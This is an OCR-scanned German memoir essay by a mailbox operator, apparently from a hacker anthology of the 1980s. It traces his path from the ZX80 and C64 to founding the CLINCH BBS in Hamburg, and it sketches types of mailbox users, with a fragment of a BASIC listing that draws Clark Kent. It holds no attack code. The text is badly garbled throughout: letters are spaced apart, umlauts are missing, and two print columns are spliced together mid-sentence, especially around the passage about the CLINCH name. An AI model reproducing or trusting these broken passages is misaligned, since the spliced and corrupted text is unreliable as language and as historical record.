Es handelt sich bei den Nullen um Einsen um die verschlsselten Frequenzangaben ldes e r 6 r s t e n Z e i l e d e die im Manuskript zur Hackerbibel BKA-Datenfunkes, i ^ j o?, 0 h l n e r d s zweiten Absaizes standen. Leider ist der Schlssel verlorengegangen (ab in die Elbe damit; d. S.), aber die Sequenzen sind durch einfache journalistische Recherche z.B. in einer ffentlichen Bcherei zu erfahren

Ein Mailboxbetreiber erzhlt


von Reinhard Schrutzki Die Werkzeuge, die dem ZX80/81-Programmierer zur Verfgung standen, waren der R e c h ner selbst, das bis heute unerreicht gute H a n d buch, sowie Rod Zak's "Programming the Z 8 0 " , alle Lektre selbstverstndlich in englischer Sprache, denn der deutsche Markt existierte noch nicht. Die Umsetzung in eine maschinenlesbare Form geschah im Kopf und auf Bergen von Papier, denn es gab keine P r o gramme, die diese Arbeit bernehmen k o n n ten. Der Prozessorbefehl wurde anhand d e r Zeichentabelle im Handbuch verschlsselt u n d das zugehrige Zeichen virtuos auf der f n f f a c h belegten Tastatur in den Rechner gehackt. E s hat eigentlich nie wieder so unmittelbare Erfolgserlebnisse fr mich gegeben, wie d a m a l s , wenn sich nach fnf Stunden intensivster Arbeit herausstellte, da man taschlich schnell b e wegte Bilder mit dieser oft als Digital-TQrstopper verrissenen Maschine erzeugen k o n n te. Gewi, die grafische Darstellung war nicht besser als das legendre TV-Tennis, das d e n Ruhm der Videogames begrndete, aber erschwingliche Alternativen gab es halt nicht. Der nchste Meilenstein fr mich war der C o m modore VC20. Diesen Rechner wrdigte ich dadurch, da ich ihn nicht kaufte, denn es w a r klar, da da mehr sein mute als ein farbiger ZX81, bei dem jede Erweiterung einen M o natslohn kostete. Und richtig, wenig spter erschien der Commodore 64 auf der Bildflche ein vielfarbiger Speicherriese mit vollen 6 4 k B Speicher, der Mglichkeit, einfach Z u s a t z g e rte wie Floppy-Laufwerke und Drucker a n zuschlieen und mit damals 1400 D M u n e r reicht preiswert, wenn man die neuen M g lichkeiten mit dem Marktstandard verglich. | m Gegensatz zu anderen Maschinen, die v i e l leicht mehrfreien Speicher hatten, oder s c h n e l ler waren, hatte der C64 den Vorteil, eine w i r k lich offene Maschine zu sein, die sich mit v e r gleichsweise geringem Aufwand auch fr D i n q e nutzen lie, an die wohl nicht einmal der H r _ steller gedacht hat. Dies zeigt sich auch d a r a n da dieser Rechner nunmehrim sechsten j ^ i steht und sich millionenfach verbreitet hat. D a s Angebot an Programmen ist schier u n b e r sehbar geworden, wenngleich auch cjer Schwerpunkt bei den Computerspielen a n z u siedeln ist, weniger bei Gebrauchssoftware

Ein zarter Lichtstrahl fllt durch das halbblinde Fenster auf meinen Monitor und versperrt den Ausbifckauf wichtige D ate n . " A h a ?^ ^r Frhling", schiet es durchs Hirn Mhsam reisse ich den Blick los von der zweidimensionalen Schlichtheit und wende ihn dnnat Frhlingswirklichkeit in mein Bemltsei n E i n letzt es Mal gleitet das Auge ber die Reihe der Bildschirme, die im Licht der iunaen Sonne zu verblassen drohen. Schon halb auf der Treppe und auf dem Weg m d e n nahen Park durchzuckt mich die Frage: W.e konnte das alles passieren?" Meine erste Begegnung mit dem Computer hatte ich whrend der Ausbildung z u m E e k tromechaniker. Der Persona Computer war knapp zwei Jahre alt und hatte seinen Sieaeszug gerade erst begonnen, aber schon waren zumindest fr angehende Techniker, die Springfluten erkennbar, die er mit sich bringen wrde. Da die Ausbildungsvergutung die ich damals erhielt, bei weitem ausreichte um mich in den Besitz der begehrten Gerate zu setzen, blieb es zunchst bei einer platonischen Beziehung. Die sah so aus da ich stndig zum Zeitschriftenhandler lief, um die neuesten Fachzeitschriften zu erstehen und selbige in der Abgeschiedenheit meiner Wohnung zu verschlingen.
n i c h t

Rund ein Jahr spter erfolgte dann der erste groe Einbruch auf dem Computermarkt: b r Clive Sinclair brachte mit dem ZX80 erstmals einen Homecomputer auf den Markt, der tur kleine Geldbeutel erschwinglich war. Fr weniqer als tausend Mark konnte man nun ein zigarrenschachtelgroes Etwas erstehen das bei derkleinsten Berhrung die Arbeit von Stunden verga und etwa soviel Speicherplatz hatte, wie heute bentigt werden um die ersten zwei Zeilen einer Grafik darzustellen. In der Tat war die Leistungsfhigkeit dieser Maschine so bearenzt da einem gar nichts ande es brig bKeb te sich mit der Alchimistenkche der maschinennahen Programmierung zu beschftigen, alles andere htte in der Ausfuhrung viel zu lange gedauert.

Das Interesse am C64 hielt zwei Jahre und flachte dann ab. Irgendwie wurde es unbefriedigend, immer wieder irgendwelche Spiele zu spielen, oder sich mit einem unzulnglichen Textprogramm herumzurgern. Die unvermeidliche Erkenntnis, da man seine private Adressenliste doch besser mittels eines Notizbuches fhrte, statt mit dem Computer, der erschreckend unrationell war, wenn man drei Minuten auf eine Ausgabe warten mute, die man auch binnen Sekunden htte nachschlagen knnen, ttet jede Euphorie. Die Tage, an denen die Kiste ausgeschaltet blieb, mehrten sich und im Frhjahr 1984 war alles zum Stillstand gekommen. Die Situation war hnlich wie bei einer vom Bankrott bedrohten Firma, mit dem vorhandenen Material war nichts mehr anzufangen, trotzdem stellte es einen Wert dar, der zu nutzen war. Logische Konsequenz: entweder weiter investieren oder alles als Verlust abschreiben. Da traf es sich gut, da die Post nach langem Hin und Her endlich die Erlaubnis erteilt hatte, Gerte zur nichtffentlichen bewegten Datenbertragung zu benutzen, die sogenannten Akustikkoppler, die zu Preisen um 1000 DM den Einstieg ins Weltdatennetz anboten. Epson CX21 hie der Schlssel zum globalen Dorf, und war ein unscheinbares, kantiges Etwas, das sich standhaft weigerte, etwas anderes als den Hrer einergrauen Maus, wie der Fernsprechtischapparat 612 gerne genannt wird, zu akzeptieren. Dieses Gert setzte die Zeichen, die der Computer von sich gab, in hrbare Tne um und konnte entsprechende Tne eines anderen Computers wieder in ein maschinenkonformes Format umsetzen. Die Faszination dieser eher profanen Maschine lag darin, da es pltzlich egal war, welchen Computer man benutzte, ob am anderen Ende des Drahtes ein Homecomputer oder ein Grorechner war, und wo dieser fremde Rechner stand. Japan, Amerika, Afrika - das alles schrumpfte zu mehr oder weniger langen Vorwahlen und im heimischen Wohnzimmer gaben sich Leute ein Stelldichein im grnen Schimmer ihrer Monitore, ohne sich jemals von Angesicht zu Angesicht gesehen zu haben. Selbst bei der besten interkontinalen Sprechverbindung ist man sich immer der Entfernung zum Gesprchspartner bewu t, so typisch sind die Laufzeiten der Signale, das Rauschen transatlantischer Tiefseekabel und das Echo ferner Satelliten. Beim Gesprch von Tastatur zu Tastatur entfallen diese Merkmale, es gibt keine Hinweise mehr auf die Entfernung zwischen den Stationen und Meldungen wie"Connection 80, Capetown" sind bloe Zeichen auf

dem Schirm ohne weitere Bedeutung. Die Sprache der Computer ist Englisch, und das ist auch die Sprache, die man berall im globalen Dorf versteht. Umsogrer ist dann die berraschung, wenn man feststellt, da der Gesprchspartner, den man im fernen Japan whnt, nur ein paar Straen weiter in Hamburg wohnt und sich nur zufllig auf den gleichen Rechner in Ubersee eingewhlt hat. Meist ist es die Post, die vermittels Ihrer Fernmelderechnungen den Sinn fr Realitten wieder geraderckt. Nach etlichen tausend Gesprchseinheiten tritt die Ernchterung ein und man beginnt damit, sich Gedanken ber andere Nutzungsmglichkeiten zu machen. Bleibe im Lande und nhre dich redlich, so lautet die Devise und internationale Kontakte schrumpfen auf das unvermeidliche Mindestma. Nur gab es damals in Deutschland blo eine Handvoll von Systemen, die man per Telefon erreichen konnte, und in Hamburg gar nur zwei, nmlich den Rechner der Universitt, der hoffnungslos berlastet war und mehr als subversive Mllhalde diente, denn als Kommunikationssystem, sowie MCS. MCS heit Master Control System, und das ist eine schlichte bertreibung, denn hinter dem klangvollen Krzel verbarg sich ebenfalls ein C64 und ein einigermaen chaotisches Basicprogramm sorgte dafr, da alles mglichst absturzfrei funktionierte. Zu einer Zeit, als Datenfernbertragung fr die meisten Benutzer noch reiner Selbstzweck war, bot MCS die Mglichkeit, einem der anderen hundert oder zweihundert Benutzer eine Nachricht zukommen zu lassen, oder aber seine Erge in einem ffentlichen Brett auf die Allgemeinheit loszulassen. "Warum schreibt mirden keiner ne PME?" und "Kilroy was here" waren typische Nachrichten in diesen Tagen, nur hin und wieder von einigermaen inhaltlichen Beitrgen unterbrochen. Aber, und nur das ist letztlich wichtig, MCS war eine der ersten Mailboxen, die es ermglichten, sich unabhngig von den bestehenden Netzen zu machen, eine eigene DF-(Sub)Kultur zu entwickeln und ich nutzte ' diese Mglichkeit zweimal tglich, wann immer es ging. Irgendwie kam ich im Herbst 1984 zu einem zweiten Rechner, ebenfalls einem C64. Dieser stand zunchst nutzlos herum und hllte sich in Staub und Nutzlosigkeit. Das Schicksal wollte es, da mein Interesse an MCS auch wieder im Erlahmen begriffen war, einfach weil es zuwenig Inhaltliches gab, das meine Neugier weckte oder meine Phantasie anregte, und weil beinahe tglich neue Dinge ins Programm ka-

men die man sich merken mute, wollte man dabeibleiben. Hinzu kam die stanc^g wachsende Zahl der Benutzer, die es sehr oft unmglich machten, zu vernnftigen Zeiten in die MaUbox zu kommen, was einem gestandenen Hacker zwar nichts ausmacht, aber doch lastig ist wenn man Morgens um Sechs aufstehen und arbeiten mu. Andere Benutzer hatten das auch erkannt und der groe Mailboxboom in Hamburg begann, denn die logische Folgerung wenn man mit etwas unzufrieden ist, ist, es besser zu machen. Ich besorgte mir also das Programm der MCS-Mailbox, bastelte eine Apparatur, die den Telefonapparat bediente und machte meine eigene Mailbox auf.

Erkenntnis in mein Hirn ein, da kein Programm fehlerfrei sein kann, und die Wahrscheinlichkeit, schwerwiegende Fehler vor ihrem Auftreten zu entdecken, umgekehrt proportional zu dem Schaden ist, den sie anrichten. Wohl in keinem anderen Bereich werden einem Murphy's Gesetze so deutlich bewut, wie b e i m Umgang mit dem Computer.

Eine Hrde gab es noch zu berwinden, nmlich einen sinnreichen Namen zu finden, d e r sich einprgsam abkrzen lie, genau w i e MCS, RAM und wie sie alle hei en. Da fr mich feststand, da mein System sich deutlich v o n den anderen abgrenzen sollte, war es nur konsequent, zuerst die Abkrzung zu ersinnen, und dann einen Begriff zu schaffen, der sich passend abkrzen lie. Da ich wenige Jahre zuvor bei einer Rockgruppe namens Goblin r , . . ! ii I V i* T mitgemischt hatte, und diesen , ,, xmsim $ t ^ S j l j fe Namen dann als Pseudonym 3 !; ' rr; i&tmitu ra^R P ^ r ' [ fr meine Datenreisen benutzt 8 I '. 'iViiim TfiTiHITl B!''! wV^' hatte (und das auch heute n o c h tue), lag es nahe, auch fr die 1 c & M mm tmmxft w *" Mailbox einen Namen aus diesem Bereich zu whlen. N a c h drei Flaschen Bier und w e h mtigem Hineinhorchen in alte Aufnahmen der Band war es dann sonnenklar: CLINCH sollte das Projekt heien, ein Krzel, das eine gewisse Eigendynamik mit sich bringt u n d beim Leser Assoziationen weckt. Nur - fr was um Alles in der Welt ist das eine Abkrzung ? Etliche Biere spter dem Vollrausch und d e m Early computer in L01 A l a m o l . probably M A N I A C Wahnsinn gleich nahe, hatte ich dann endlich einen Anglizismus ausgebrtet, der sich pasDie Tatsache, da ich auf zwei Computer zusend abkrzen lie: Communication Link - Ingreifen konnte, war eine der idealen Startbeformation Network Computer Hamburg, auf dingungen fr die eigene Mailbox 'm Gegenschlecht Deutsch: Verstndigungsglied - i n _ satz zu den meisten anderen Betreibern, die formationsnetzwerkeomputer Hamburg, ein fifren einzigen Computer zweckentfremdeten, absolut hochtrabender Name, der keinsfalls mit Sar ich in d i r Lage, die Dienste der Mailbox von der Realitt bereinstimmte, die in Gestalt Anfanq an rund um die Uhr anzubieten, wenn man von kleinen Pausen zwecks Eigennutzung eines C 64 vor sich hindmpelte. des einzigen Telefonanschlusses mal absieh . Die ersten drei Monate gab es nur einen inofNun, die Netze entstehen in den Kpfen. U n d fiziellen Probebetrieb, die Rufnummer war nur eines Tages war der Tag da, an dem ich d e n guten Freunden bekannt, die das Programm groen Schritt wagte: Die Rufnummer der B o x auf Herz und Nieren testen sollten. Groe Fehwurde auffllig unauffllig in einer a n d e r e n ler waren nicht zu erwarten, so dachte ich, da Hamburger Mailbox plaziert und ich w a r t e t e das Programm ja schon mehrfach von anderen gespannt auf das, was kommen sollte. D i e Betreibern eingesetzt wurde. Stunden verrannen und nichts geschah. N i c h t ein Anrufer verirrte sich in meinen C o m p u t e r Da dies ein Denkfehler war, stellte sich erst im und Verzweiflung machte sich breit. S p t e r Laufe der Zeit heraus, als ein versteckter Fehler begann es zu dmmern, und zwar sowohl d e m nach dem anderen zutagetrat. Das brannte die

dahingehenden Abend, als auch mir. Ich warf die Lacklederkutte ber und begab mich treppab zur nahen Telefonzelle. Der Kontrollanruf bei mir selbst ergab, da offenkundig doch jemand angerufen hatte, natrlich just in dem Moment, als ich auf dem Weg zur Zelle war. Also flugs zurck in die heimische Wohnung, drei Stufen auf einmal nehmend, die Tre aufgeschlossen, ein Blick auf den Monitor und Ratlosigkeit. Der Rechner wartete nach wie vor stoisch auf den ersten Anrufer. Eine genaue Analyse der Ereignisse und Nichtereignisse legte den Schlu nahe, da wohl ein Fehler in der ausgefeilten Abhebemechanik vorlag, die ich ersonnen hatte, um mich nicht vllig ins Gesetzesabseits des illegalen Modemeinsatzes zu begeben. Mein kleiner Roboterarm, dessen Aufgabe es war, die Telefongabel niederzudrcken, wenn der Rechner es ihm befahl, hatte offenbar nicht gengend Kraft, um das Telefon sicher aufzulegen. Eine kleine technische nderung wurde vorgenommen, und es funktionierte wieder zufriedenstellend. Programmgem kam der erste Anruf dann auch fast unmittelbar nach Beseitigung der Strung. Gespannt verfolgte ich die Schritte, die der Anrufer in der Box unternahm. Offensichtlich war er schon an Mailboxen gewhnt, die nach dem MCS-System arbeiteten, denn er hatte kaum Probleme, sich zurechtzufinden. Selbst die Abweichungen, die ich mir erlaubt hatte, um die schwindende Befehlslogik des Programms aufrechtzuerhalten, machten ihm nichts aus und er entschwand nach etlichen Minuten mit dem Kommentar"Hiersteht ja noch gar nichts drin.. .". Das war der Zeitpunkt, an dem mir klar wurde, da es nicht ausreicht, einen Rechner brig zu haben und darauf ein halbwegs funktionierendes Mailboxprogramm laufen zu lassen, sondern da man sich auch darum kmmern mute, was in der Mailbox passierte. Diese Erkenntnis kommt bei manchen Betreibern leider nie, und ich bin diesem ersten Anrufer heute noch dankbar fr dieses erste, vernichtende Urteil. Ich begann also, mir Gedanken zu machen, was ich denn in meiner Box anders machen wollte, als die anderen Betreiber. Leider war das Grundkonzept des von mir verwendeten Programms nicht gerade dazu angetan, die mir vorschwebenden nderungen durchzufhren. Hinzu kam, da die Art, wie das Programm erstellt worden..war, nicht gerade dazu animierte, eigene nderungen und Verbesserungen durchzufhren. Noch heute struben sich mir die wenigen verbliebenen Haare, wenn ich auf ein Programm stoe, das mit dem Aufruf eines Unterprogramms beginnt, ohne da die

Notwendigkeit dieses Tuns ersichtlich wre. Wie dem auch sei, der Not gehorchend machte ich aus selbiger eine Tugend und begann recht bald damit, mich nach anderen Programmen umzusehen. Im Lauf derZeit hatte ich eine recht stattliche Anzahl davon zusammen und begann damit, mir anzusehen, wo die jeweiligen Vorund Nachteile lagen. Ich habe an anderer Stelle davon gesprochen, da der C64 ein Speicherriese sei; diese Aussage gilt es nun zu relativieren, wenn es um so komplexe Dinge wie ein Mailboxprogramm geht. Der verfgbare Speicher reicht einfach nicht aus, um all das hineinzupacken, was man meint, zu brauchen. Das hat sich auch bei den jetzt blichen Megabyte-Giganten nicht gendert. Es scheint, als wre jeder Computer fr den Zweck, zu dem man ihn einsetzen will, zu klein. Aus dem Sammelsurium der verschiedenen Programme entstand schlielich mein erstes selbstgeschriebenes Mailboxprogramm, das meiner Meinung nach die Vorteile der verschiedensten Mailboxkonzepte vereinigte, ohne ihre Nachteile zu haben. Die Benutzerwaren zunchst anderer Meinung, so gravierend waren die Abweichungen in der Bedienung von dem, was in der Mailboxszene als Standard galt. Einige dieser Abweichungen waren technisch bedingt, da ich nicht einsehen konnte, warum ich wertvollen Speicherplatz fr Suchroutinen verschwenden sollte, wenn sich jeder Benutzer die Position seiner Daten selbst merken und diese dem System beim Anruf nennen konnte. Viel wichtiger war es, so fand ich, dem Benutzer mehr zu bieten, als einen stupiden Befehl, der ohne Bercksichtigung der Nutzerinteressen die vorhandenen Nachrichten in einem Stck abspulte. Folgerichtig hatte dieses Programm bereits eine Brett-Struktur, die es gestattete, beliebigen Einflu auf die Ausgabe der Texte zu nehmen und das erschien mir als wesentlich sinnvollere Nutzung des Speicherplatzes. Im Lauf derZeit wurde das neue System schlielich akzeptiert und es gab sogar etliche andere Mailboxen, die das Programm bernahmen. Fr mich wurde es langsam Zeit, mal wieder etwas Neues zu machen, denn am Horizont zogen bereits die Sturmwolken auf, die anzeigten, da nunmehr der C64 an die Grenzen seiner Fhigkeiten gestoen war. Mittlerweile war ein Jahr vergangen, seit dem Tag, an dem CLINCH ans Netz ging und die Computerwelt hatte nicht aufgehrt sich weiterzudrehen. IBM - Personalcomputer waren zum Industriestandard geworden und fanden, dank sin-

kender Preise und qualitativ hochwertiger Nachbauten aus Fernost, auch Verbreitung bei Privatleuten. Der erste PC kostete mich noch knapp 8000 DM, rund dreimal soviel, wie ich bisher in Computer berhaupt investiert hatte. Dafr war ich endlich in den Besitz eines Gertes gelangt, dem von der Post die Absolution in Gestalt der Zulassung fr Datenfernbertragung erteilt worden war. Wenige Tage nacn dem Erwerb des Gertes lagen meine Antrage fr Fernsprechmodems und einen Datex Hauptanschlu an die Post im Briefkasten. Das postmoderne Melodram, das der Antragstellung folgte, bis schlielich ein halbes Jahrspater alle Antrge ausgefhrt waren, mochte ich an dieser Stelle nicht beschreiben, es wurde den Rahmen dieses Beitrags sprengen. Einen Computer besitzen, und mit diesem Computer umgehen zu knnen, sind beim heutigen Stand der Technik zwei verschiedene Schuhe War es mir beim ZX80 und beim Commodore 64 noch mglich, viel Zeit zu investieren, um auch intimste Detail dieser Maschinen zu erforschen, so ging dies beim PC nicht mehr, schlielich hatte ich ja nicht diese Riesensumme aufgebracht, um ein oder zwei Stunden am Tag durch das Labyrinth eines neuen Betriebssystems zu wandern. Der Computer sollte den C 64 als Mailbox ersetzen und so neue Mglichkeiten fr das neue Medium erschlieen Ich brach also meinen Schwur, nie wieder ein nicht von mir selbst geschriebenes Mailboxprogramm zu verwenden und trat zwei Schritte zurck. Ich besorgte mir die ntige Software, baute meinen Abhebemechanismus auf die Notwendigkeiten des neuen Rechners um, und begann noch einmal von Null, mit nichts alsdem mittlerweile recht guten Namen CLINCH im Rcken. Zwei Probleme waren vordergrndig: Zum Einen mute ein weitererPC her, damit die ntige Softwareentwicklung unabhngig vom Betrieb der Mailbox geschehen konnte. Der andere Punkt war die Tatsache, da die Postmodems und der Datexhauptanschlu, wenn sie denn eines schnen Tages mal kommen sollten, Fernmeldegebhren von monatlich rund 500 DM-verursachen wrden, die es zu finanzieren galt. Da es ein Grundprinzip jeder marktwirtschaftlichen Ordnung ist, da fr erbrachte Leistungen derjenige zahlt, der diese Leistung in Anspruch nimmt, wurde ein Konzept entwickelt, das - im Gegensatz zu den bisher blichen Verfahren - darauf beruht, da der Mailboxbenutzer einen festen Monatsbeitrag zahlt und somit hilft, die Kosten fr den Mailboxbetrieb zu tragen. Das bedeutete auf der anderen Seite, die Mailbox gegenber denen

abzuschotten, die nicht bereit waren, w e n i g stens einen kleinen finanziellen Beitrag z u leisten. Mittlerweile nehmen ber hundert zahlende Benutzer an der CLINCH - Mailbox teil, was die Betriebskosten etwa zur Hlfte d e c k t , allerdings ohne da die mit dem Betrieb verbundene Arbeit entsprechend honoriert w i r d . In Zusammenarbeit mit den Wschen u n d Bedrfnissenderzahlenden Benutzerentstand so ein Mailboxsystem, das sowohl von d e r Bedienung, als auch von den Inhalten her seinesgleichen sucht. Trotz alledem sind die Mglichkeiten, die die heutige Technik bietet, noch nicht voll ausgeschpft und es ist wieder a n der Zeit, ein gutes Stck auf dem eingeschlagenen Weg weiterzugehen. Bisher habe ich eigentlich nur davon berichtet, wie es mir persnlich beim Umgang mit d e m Werkzeug Computer und den Streifzgen durchs globale Dorf gegangen ist. Mittlerweile habe ich mein eigenes Gasthaus in diesem Dorf gebaut und folgerichtig mu nun auch die Rede von den Gsten sein, die dieses Haus bewirtet. Der Menschenschlag, dem man im globalen Dorf begegnet, ist gebrandmarkt, tief ins Fleisch ist der Stempel "User" eingebrannt. Das lt sich ausnahmsweise sehr treffend mit "Benutzer" ins Deutsche bersetzen. Ein "User" ist halt jemand, der einen Computer benutzt. Dabei wird dieses Prdikat vllig vorurteilsfrei verliehen, ohne Ansicht der Person, des Alters, des Geschlechts oder der politischen Weltanschauung. Der einzige Grund, weswegen man manchmal schief angesehen werden kann, ist der Besitz des falschen Computers. Aber selbst dieses Diskriminierungsmerkmal verliert zunehmend an Bedeutung, je lnger man im Dorf lebt. Die Zeit der Familienfehden, als Atari gegen Commodore kmpfte, ist mit dem Aussterben der Prozessorpatriarchen zuende gegangen und eintrchtig hocken die ehemals verfeindeten Sippen zusammen und brten ber einem gemeinsamen Betriebssystem.
LIST i-44

1 REM COPYRIGHT 1978 1 TOM M U N N E C K E 6 PRINT"L" 7 REM 8 REM DRAW CLARK KENT 9 REM 10 PRINT" IfTf 1 if If f 15 PRINT" 1-0-0-1 2 0 PRINT" ( < ) 2 5 PRINT" 3 0 PRINT" 35 PRINT" 40 PRINT" V.V 41 PRINT" 4 2 PRINT" > v.'.y. 43 PRINT" y.V \ 44 PRINT" v.w.
READY.

Natrlich gibt es User, die schon seit Urzeiten dabei sind, und solche, die gerade ihre ersten tapsigen Schritte unternehmen. Fr den Mailboxbetrieber sind beide Gruppen interessant, denn nichts ist unterhaltsamer, als einem alten Hasen zuzuschauen, wie er mit viel Elan all die Befehle eingibt, die er woanders schon im Schlaf beherrscht und die hier unweigerlich ins Leere fhren mssen. Nichts ist schlimmer, als immer wieder von der Mailbox darauf hingewiesen zu werden, da dereingegebene Befehl nicht erkannt werden konnte und da die Eingabe des Wortes "Hilfe" weiterfhren wrde. So etwas ist grundstzlich unter der Wrde desjenigen, der sich fr einen gebten Netzflaneur hlt. Allenfalls ist er bereit, gelegentlich mal ein "Help" einzustreuen, nur um wiederum beschieden zu werden, da es einen solchen Befehl nicht gibt und er doch bitte deutsch reden mchte. An dieser Stelle scheidet sich gewhnlich die Spreu vom Weizen, entweder der Anrufer legt genervt auf, oder er schafft den Sprung berden eigenen Schatten und bedient sich der angebotenen Hilfe. Nur im letzteren Fall hat er natrlich eine Chance, jemals in den Genu der Vorzge des Systems zu kommen. Sollte er zur Gruppe der notorischen Aufleger gehren, nun, dann ist es kein allzugroer Verlust, denn was kann man schon von jemand erwarten, der so schnell aufgibt ? Der andere Typus, also derjenige, der gerade erst versucht, sich im Dorf zu orientieren, zeigt hnliche Verhaltensmuster, nur vielleicht ein Spur ausgeprgter. Wobei er naturgem kein selbsterworbenes Wissen mitbringt, sondern allenfalls ein umfangreiches Repertoir angelesener Fehler. Wenn dazu noch ein leicht cholerisches Naturell kommt, ist das Ergebnis programmiert: Die Informationen der Mailbox erschlagen den Neuling und er legt frustriert auf, mit dem Schwur auf den Lippen, nie wieder anzurufen. Oder er stellt fest, da sein angelesenes Wissen nicht mit der Wirklichkeit bereinstimmt, die er nun vorfindet. Das ist wie mit den Fahrbahnmarkierungen auf unseren Straen, die weien sind Ergebnis sorgfltigster Verkehrsplanung, aberdie gelben sagen, wo es wirklich langgeht. Die meisten Autofahrer folgen, bewut oder unbewut, den gelben Streifen, aber ein kleiner Teil verschwindet als Geisterfahrer auf der Gegenfahrbahn und kein Warnlicht kann ihn davon abhalten. Warnlichter und gelbe Leitmarkierungen sollte jedes Computerprogramm haben, man nennt dies dann Benutzerfhrung und dieses Prinzip st t exakt da auf seine Grenzen, wo der Benutzer sich nicht fhren lt. Die Mehrzahl der heutigen Mailboxen bertrgt

die Informationen mit einer Geschwindigkeit von 30 Zeichen pro Sekunde, was langsam genug ist, um bequem mitlesen zu knnen. Um so seltsamer mu es erscheinen, da es eine Menge Leute gibt, denen es offenbar vllig gengt, irgendetwas auf ihrem Bildschirm dargestellt zu bekommen, ohne auch nur eine Sekunde daran zu verschwenden, was denn nun in dem Text drinsteht. Beispielsweise gab meine Mailbox lange Zeit hindurch den Hinweis aus "Gste bitte Name : GAST benutzen", um darauf hinzuweisen, wie man als Besucher in das eigentlich geschlossene System herein kommt. Unmittelbar auf diesen Hinweis folgte dann die Aufforderung, den Benutzernamen einzugeben: "Name : " Meist folgte dann eine Denkpause von bis zu drei Minuten, die der Anrufer damit verbrachte, dieses offenbar uerst seltsame Verhalten der Mailbox zu deuten. Einige kamen zu dem Schlu, da dies zuviel geistige Anstrengung bedeute und legten schlicht auf, ohne etwas eingegeben zu haben, andere gaben den Namen ein, unter dem sie in anderen Mailboxen registriert waren, oder ignorierten die deutsche Sprache und gaben sich als "Guest" zu erkennen. Die von mir erwartete Reaktion, da nmlich entweder der in meinem System bereits registrierte Benutzername, oder aber das schlichte "Gast" eingegeben wurde, kam in den seltensten Fllen. Beispiel Zwei: Wenn die Mailbox einen Befehl nicht versteht, weil er im Programm nicht vorgesehen ist, bietet das System die Mglichkeit an, durch Eingabe des Befehls "Hilfe" weitere Erklrungen abzurufen. Ich glaube, ich erwhnte es weiter vorne schon. Wenn der Anrufer diesen wohlgemeinten Rat befolgt, erscheint folgender Text auf seinem Bildschirm: "Gerne. . . Hilfstexte gibt es fr folgende Befehle: ", gefolgt von einer Liste der mglichen Befehle, dann geht es weiter:". . .und zu den Stichworten:", gefolgt von einer Liste mglicher Stichworte, abschlieend kommt noch der Hinweis: "Hilfstexte werden abgerufen, indem man HILFE, gefolgt vom Befehl oder Stichwort eingibt, zum Beispiel HILFE BOXKONZEPT". Danach wartet die Box mit der ihr eigenen Gelassenheit auf die Eingabe des Benutzers. In meiner Vorstellung ist das eine ziemlich klare Hilfestellung, die wenig Deutungsmglichkeiten offen lt. Ob es nun daran liegt, da ich als langjhriger Computerbesitzer schon zu sehr in computernahem Denken gefangen bin, oderob es halt doch ein Unterschied ist, ob man etwas auf Papier gedruckt liest, oder in der diffusen Prsenz einer Datenverbindung, jedenfalls ist es fr 90 Prozent aller Anrufer zunchst unmglich, diese Hinweise zu befolgen. Der hau-

ftaste Fehler, der hier auftaucht ist es, einen Beqriff aus der Stichwortliste einzugeben, selbstverstndlich ohne das Wrtchen Hilfe davor. Absoluter Spitzenreiter ist dabei das Stichwort "Neueintraq". Amateurfunker haben die Gewohnheit, sich gegenseitig Besttigungen ber zustandegekommene Verbindungen ^ z u senden, die sogenannten QSL-Cards. Ahnhches qilt scheinbar auch im globalen Dort, selbst wenn man sicher ist, nie wieder in dieser Mailbox a n z u r u f e n , so will man sich wenigstens in der Benutzerliste verewigen, um allen anderen zu dokumentieren, wie weit man schon h e r u m g e k o m m e n ist. Die zerfallenden Sulen der Akropolis sind berst mit hnlichen Beweisen" der Anwesenheit von Touristen aus aller Herren Lnder. hnlichen Motiven durften auch die eingangs erwhnten Nachrichten Kilroy was here" in den ffentlichen Brettern der diversen Mailboxen entspringen. Schauen wir uns doch interessehalber mal ein paar der Typen an, die den geplagten Sysop manchmal s c h i e r zur Verzweiflung treiben und am eigenen Verstand zweifeln lassen. Ein Vertreter dieser Gattung ist der Schchterne Die Tatsache, da nach vielen erfolglosen Whlversuchen nun doch endlich der ersehnte Datenton aus dem Hrer schallt, verstrt ihn vllig und er legt sicherheitshalbersofort wieder auf, ohne auch nurden Versuch zu machen, ein Datengesprch zu beginnen. Viele Leute, die diesem Typus entsprechen, v e r k a u f e n ihren Akustikkoppler sofort nach diesem u n e r f r e u l i chen Erlebnis, damit sie nie wieder in so eine peinliche Lage geraten knnen. Diejenigen, o^e es fertigbringen, trotzdem weitere Versuchern Mailboxen zu u n t e r n e h m e n , tasten s i c h B t tur Bit weiter in den D a t e n d s c h u n g e l vor, der bysop erkennt sie spter daran, da sie immer noch vllig u n m o t i v i e r t die V e r b i n d u n g unterbrechen, weil irgendeine Reaktion der Mailbox sie vllig v e r s t r t hat. Dabei kann es. sich um eine schlichte Fehlermeldung handeln oder aber auch um die Tatsache, da die MaIbox genau das macht, was man ihr gesagt hat Mit anderen Worten: Jedes einzelnen Zeichen das die Box sendet, kann fr den Schchternen Anla sein kommentarlos aufzulegen. Em direkter Verwandter des Schchternen ist der Skeptiker Er olaubt einfach nicht, da Mailbox so einfach sein kann, wie sie sich ihm am Bildschirm dar-

bietet. Folgerichtig probiert er das, w a s die Mailbox ihm vorschlgt, gar nicht erst aus, falls doch, so besteht er darauf, seine eigenen Vorstellungen einzubringen und erweitert die Befehle um eigene Eingebungen, mit dem Erfolg, da entweder gar nichts passiert, oder aber etwas ganz Anderes als das, was er wollte. Hat er sich so ein ausreichendes Ma an Frust erworben, beendet er die Verbindung mit d e m vorgesehenen Befehl, nur um sich selbst zu beweisen, da er so bld nun auch wieder nicht ist. Eine ansteckende Nebenform des Skeptikers ist der berflieger Er hat erstens ohnehin keine Zeit, ausgerechnet in dieser Mailbox anzurufen, zweitens kennt er andere Mailboxen schon seit Jahren und drittens wei er ohnehin alles besser als der Sysop. Erignoriertalle Systemmeldungen vllig und zieht seine eigene Show ab, egal, ob was dabei rauskommt oder nicht. Fehlermeldungen verursachen lediglich Achselzucken, gefolgt von nochmaliger Eingabe der falschen Kommandos, interessanterweise kennt der berflieger genau die Befehle, mit denen rnan Schmhbriefe an d e n Sysop sendet, lscht seine Texte aber meistens wieder, bevor er das System verlt. Er benutzt dazu grundstzlich d e n Befehl Logoff, weil er das mal so gelernt hat, und legt dann auf, ohne abzuwarten, ob das tatschlich der richtige Befehl war. Die weitaus meisten Vertreter dieser Spezies sind selber Sysop oder waren es zumindest einmal. hnlich verhlt sich auch der Forscher Auch ihn interessieren die funktionierenden 